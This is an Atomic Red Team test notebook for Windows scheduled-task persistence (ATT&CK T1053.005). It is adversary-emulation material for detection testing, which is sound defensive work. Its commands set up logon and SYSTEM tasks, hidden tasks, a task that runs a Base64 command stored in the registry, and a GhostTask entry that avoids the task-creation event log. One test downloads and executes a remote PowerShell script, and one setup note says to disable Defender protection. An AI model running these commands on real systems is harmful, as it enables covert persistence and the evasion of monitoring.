# T1053.005 - Scheduled Task
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)

Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) 

## Atomic Tests

### Atomic Test #1 - Scheduled Task Startup ScriptRun an exe on user logon or system startup.  Upon execution, success messages will be displayed for the two scheduled tasks. To view
the tasks, open the Task Scheduler and look in the Active Tasks pane.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 1

#### Cleanup: 
```cmd
schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1
schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Scheduled task LocalUpon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 2

#### Cleanup: 
```cmd
SCHTASKS /Delete /TN spawn /F >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Scheduled task RemoteCreate a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 3

#### Cleanup: 
```cmd
SCHTASKS /Delete /S localhost /U DOMAIN\user /P At0micStrong /TN "Atomic task" /F >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Powershell Cmdlet Scheduled TaskCreate an atomic scheduled task that leverages native powershell cmdlets.

Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 4

#### Cleanup: 
```powershell
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Task Scheduler via VBA
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
30 - 40 seconds after this module has run

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "Word" -sub "Scheduler"
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 5

#### Cleanup: 
```powershell
Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 5 -Cleanup

### Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task
Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: File to copy must exist on disk at specified location (#{xml_path})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml"

```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 6

#### Cleanup: 
```powershell
Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 6 -Cleanup

### Atomic Test #7 - Scheduled Task Executing Base64 Encoded Commands From RegistryA Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.
The scheduled task will launch powershell to decode and run the command in the registry daily.
This is a persistence mechanism recently seen in use by Qakbot.  

[Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st 07:45
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 7

#### Cleanup: 
```cmd
schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 7 -Cleanup

### Atomic Test #8 - Import XML Schedule Task with Hidden Attribute
Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. 
This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: File to copy must exist on disk at specified location (#{xml_path})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml"

```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 8

#### Cleanup: 
```powershell
Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 8 -Cleanup

### Atomic Test #9 - PowerShell Modify A Scheduled TaskCreate a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered. 
It will first be created to spawn cmd.exe, but modified to run notepad.exe.

Upon successful execution, powershell.exe will create a scheduled task and modify the action. 
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 9

#### Cleanup: 
```powershell
Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false >$null 2>&1
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 9 -Cleanup

### Atomic Test #10 - Scheduled Task ("Ghost Task") via Registry Key Manipulation
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means.
This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command.
For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: PsExec tool from Sysinternals must exist in the ExternalPayloads directory

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force

```
##### Description: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "PathToAtomicsFolder\..\ExternalPayloads\"`

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe") { exit 0} else { exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe"

```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 10 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\localhost -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\localhost add lilghostie "cmd.exe" "/c notepad.exe" $env:USERDOMAIN + '\' + $env:USERNAME logon
```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 10

#### Cleanup: 
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\localhost -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\localhost delete lilghostie > nul```

In [ ]:
Invoke-AtomicTest T1053.005 -TestNumbers 10 -Cleanup

## Detection
Monitor process execution from the <code>svchost.exe</code> in Windows 10 and the Windows Task Scheduler <code>taskeng.exe</code> for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.

Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)

* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled

Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)

Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.